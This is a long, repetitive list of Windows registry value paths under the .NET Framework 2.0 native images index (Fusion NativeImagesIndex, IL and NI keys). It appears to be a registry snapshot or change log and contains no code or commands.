HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\3d40437\34 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\226b2009\5b43ba09\72 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 MissingDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 NIDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 MissingDependencies

